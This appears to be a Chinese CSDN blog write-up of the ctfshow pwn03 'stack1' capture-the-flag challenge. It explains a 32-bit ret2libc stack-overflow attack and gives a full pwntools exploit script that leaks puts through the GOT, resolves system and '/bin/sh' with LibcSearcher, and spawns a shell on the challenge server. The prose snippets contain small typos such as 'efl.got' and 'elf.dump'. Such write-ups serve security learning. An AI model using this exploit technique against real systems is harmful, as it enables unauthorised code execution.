ctfshow_pwn03 stack1

最新推荐文章于 2024-08-03 00:03:53 发布
最新推荐文章于 2024-08-03 00:03:53 发布
阅读量192 收藏
点赞数
分类专栏: pwn 文章标签: 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yw__y/article/details/131906609
版权

checksec一下

在这里插入图片描述
32位程序开了nx,ret2shellcode不行了
拖入ida
main函数在这里插入图片描述
查看那个好明显的函数pwnme
在这里插入图片描述
可溢出
没有找到后门等
ret2text和ret2syscall都不可以了
我能想到的是ret2libc
本题有puts,所以可以用puts来泄露libc的版本
原因:延时绑定,可以泄露调用过的函数的got地址(具体不太了解)
第一个payload

payload=b'a'*13+p32(puts_plt)+p32(main_addr)+p32(puts_got)

之前的准备:

elf=ELF('./stack1')
puts_plt=elf.plt['puts']
puts_got=efl.got['puts']
main_addr=elf.symbols['main']

偏移量的计算:ida给的是对的
在这里插入图片描述
9+4=13
解释为啥payload先plt再main最后got
我的理解:先plt是调用puts函数,main的地址作为返回地址为了下一次的payload发送,got则作为函数的参数,即puts函数的地址。
发送数据后要接受puts的地址
接受之前要

io.recvuntil('32bits\n')
io.recvuntil('\n')

之后接收数据

puts_addr=u32(io.recv(4))

接收四个字节(32位的一个地址长度)

然后获取libc版本

libc=LibcSearcher('puts',puts_addr)

计算基址

libcbase=puts_addr-elf.dump('puts')

算system和/bin/sh

sys_addr=libcbase+libc.dump('system')
bin_sh=libcbase+libc.dump('str_bin_sh')

最终exp

from pwn import*
from LibcSearcher import*
#io=process('./stack1')
io=remote('pwn.challenge.ctf.show',28190)
elf=ELF('./stack1')
puts_got=elf.got['puts']
puts_plt=elf.plt['puts']
main_addr=elf.symbols['main']
payload=b'a'*13+p32(puts_plt)+p32(main_addr)+p32(puts_got)
io.sendline(payload)
io.recvuntil('32bits\n')
io.recvuntil('\n')
puts_addr=u32(io.recv(4))
print(hex(puts_addr))
libc=LibcSearcher('puts',puts_addr)
libcbase=puts_addr-libc.dump('puts')
sys_addr=libcbase+libc.dump('system')
bin_sh=libcbase+libc.dump('str_bin_sh')
payload=b'a'*13+p32(sys_addr)+b'a'*4+p32(bin_sh)
io.sendline(payload)
io.interactive()

运行后就可以拿到shell啦

yw__y
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
1. "PWN.c":这很可能是 AVR 单片机的 C 语言源代码,实现了 PWM 输出功能。我们可以预期代码中包含了初始化 PWM 定时器、设置 PWM 配置、以及可能的 PWM 寄存器操作等内容。 2. "www.pudn.com.txt":这个文件可能是...
PWN.zip_PWN控制舵机_pwn控制_pwn控制h桥_数字舵机_电机
07-14
pwm波输出,实现数字舵机的控制,完成一些简单的电机控制问题
pwm.zip_PIC_PWN
09-14
标题"PWM.zip_PIC_PWN"暗示了这是一个与微控制器Pic相关的项目,主要涉及的是脉宽调制(PWM)技术的汇编语言源代码。在嵌入式系统中,PIC微控制器是广泛应用的一种微处理器,尤其在控制和信号处理任务中。而PWM是一...
PWM.rar_ARM7 汇编_PWN_pwm arm7
09-22
1. C语言源代码:这部分代码可能负责设置定时器参数、初始化PWM接口以及根据应用需求调整占空比。 2. ARM7汇编代码:可能包括更底层的定时器控制和中断处理函数,这些函数可能直接操作硬件寄存器以实现PWM功能。 ...
PWN.rar_PWN
09-24
在IT领域,PWN(Payload Writing Notation)通常与安全竞赛和漏洞利用有关,尤其是在网络安全和逆向工程中。然而,这里的"pwn"似乎指的是一个特定的功能或项目,而不是通常的安全概念。从标题和描述来看,我们正在...
学习硬件测试04:触摸按键+PWM 驱动蜂鸣器+数码管(P62~P67、P71、P72)
Xuexi_touteng的博客
07-31 203
Qutput compare preload 输出比较预加载:使能(可以改变占空比,而不是固定占空比)极速模式:关闭CH 极性:高(小于 CCR 的状态)状态:重置。
学习笔记 - 二极管的参数与选型
最新发布
qq_19343801的博客
08-03 269
(白线边为阴极)常见肖特基二极管参数可以用快恢复二极管代替肖特基二极管,特别是肖特基二极管的耐压都不会很高,在高压场合需要使用快恢复二极管代替肖特基二极管。
(学习总结10)C++类和对象1
瞌睡不来的博客
08-02 476
C++类和对象总结1
学习记录——day23 多进程编程
weixin_64918301的博客
07-31 638
1、在进程的创建过程,其实就是通过拷贝父进程的lask stucl结构体而来的,子进程中保存了大部分的父进程的遗传基因(内容一致),只需要修改少部分的内容,如子进程的进程号,子进程的父进程号。3、2号进程:也称kthreadd,该进程由0号进程产生,也称为调度进程,当某个就绪进程时间 片轮到时,该进程负责进程的调度工。4、孤儿进程:当前进程的父进程死亡后,但是当前进程还没有结束,那么当前进程称为孤儿 进程,孤儿进程会由1号进程收养。
z3基础学习
google20的博客
08-02 129
安全基础学习-keil调试汇编代码
小夭的博客
07-31 668
初始目的是为了通过汇编编写CRC功能。但是基础为0,所以目前从搭建工程开始记录。大佬绕路。
Day16_2--Servlet学习之过滤器+session实现防跳墙
gitee_nanzhi66的博客
08-02 363
Servlet过滤器Fileter是一个小型的web组件,它们通过拦截请求和响应,以便查看、提取或以某种方式操作客户端和服务器之间交换的数据,实现“过滤”的功能。Filter通常封装了一些功能的web组件,过滤器提供了一种面向对象的模块化机制,将任务封装到一个可插入的组件中, Filter组件通过配置文件来声明,并动态的代理。3.拦截放行:在拦截器中对登录需要的请求和响应放行,其他请求和响应都要做逻辑判断,如果存在Session会话属性login的键值对就允许访问,否则拦截。来介绍拦截器,请细看。
机械学习—零基础学习日志(高数18——无穷小与无穷大)
AI_freshfish的博客
08-01 346
这里可以记住,无穷小有一个特殊,那就是零。零是最高阶的无穷小,且零是唯一一个常数无穷小。张宇老师还是使用了超实数概念来讲解无穷小。其实是利于理解的,但希望大家接触新概念过程不要太抗拒。数学概念理解,其实可以借用生活概念。张宇老师这里把1除以无穷小,理解成把1分为若干个无穷小。所以得到的就是无穷大。1除以超实数所以得到超实数的结果。
【传知代码】基于标签相关性的多标签学习(论文复现)
ztK63LrD的博客
08-02 698
多标签学习作为处理现实世界复杂数据的重要方法,其有效性在很大程度上依赖于如何处理标签之间的相关性。本文探讨了基于标签相关性的多标签学习的关键技术和方法。我们首先介绍了不同的标签相关性建模方法,包括基于图结构的方法、注意力机制和迁移学习等。通过实例和案例分析,我们展示了这些方法如何提高模型对多标签数据的分类精度和泛化能力。特别是在面对标签稀疏性和噪声数据时,这些方法显示出了明显的优势和适应能力。
Mybatis的注解开发学习笔记
小吴
08-02 141
【代码】Mybatis的注解开发学习笔记。
从零开始学习网络安全渗透测试之基础入门篇——(六)网络抓包&全局协议&封包监听&网卡模式&科来&wireshark&PC应用
love6a6的博客
08-02 694
是一种用于捕获和分析网络数据包的技术手段。它能够帮助我们深入了解网络中的数据传输情况,对于网络故障排查、性能优化、安全监测等方面都具有重要意义。网络抓包的工作原理通常是通过将网络接口设置为混杂模式,使其能够接收流经该接口的所有数据包。然后,使用专门的抓包软件或工具对这些数据包进行捕获和存储。为了方便大家使用,作者收集到百度网盘分享学习。链接:https://pan.baidu.com/s/1uKUsQfIlWOxTNPvU8DewKQ?pwd=mf7v提取码:mf7v。
【工具】-gdb-学习笔记
mails2008的专栏
08-02 314
程序的发布方式有两种,debug模式和release模式Linux gcc/g++出来的二进制程序,默认是release模式要使用gdb调试,必须在源代码生成二进制程序的时候, 加上 -g 选项,发布成debug模式命令:gcc -o test test.c -g。
【C++】构造函数的深入学习
weixin_60546365的博客
07-30 386
所有对象共享同一份数据 -- 你改了别人用的就是改过的数据。类中声明,类外初始化 -- 必须要有一个初始值否则没法用。所有对象共享同一个函数,类外访问不到私有静态函数。静态成员函数只能访问静态成员变量。静态成员变量访问权限:在Private作用域下访问,出了这个类不可以访问。分配内存 -- 生成了exe程序,还没有双击运行之前已经分配在全局区中。语法:构造函数():属性1(值1),属性2(值2)...{ }先构造A再构造B,先析构B再析构A(先进后出LIFO)C++提供初始化列表语法用来初始化属性。
学习笔记】决策单调性优化DP
Brute♂force
08-02 542
GDCPC还在发力,清华出题组出的牛客还是 4 题。这次没有min25筛,不然我能5题(bushi除了一道用 prufer 序列的恶心 DP 外,还有一道DP题是一个状态难想,并且还需要决策单调性优化的DP,被认为是偏简单的银牌题。
ctfshow的pwn2
09-28
ctfshow的pwn2是一道2021年鹏城实验室的pwn题,该题目考查了libc-2.31.so下off-by-null的漏洞利用。根据提供的引用和引用,我们可以看到解题的步骤如下: 1. 首先,使用ls命令查看当前运行程序下的文件,找到flag...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值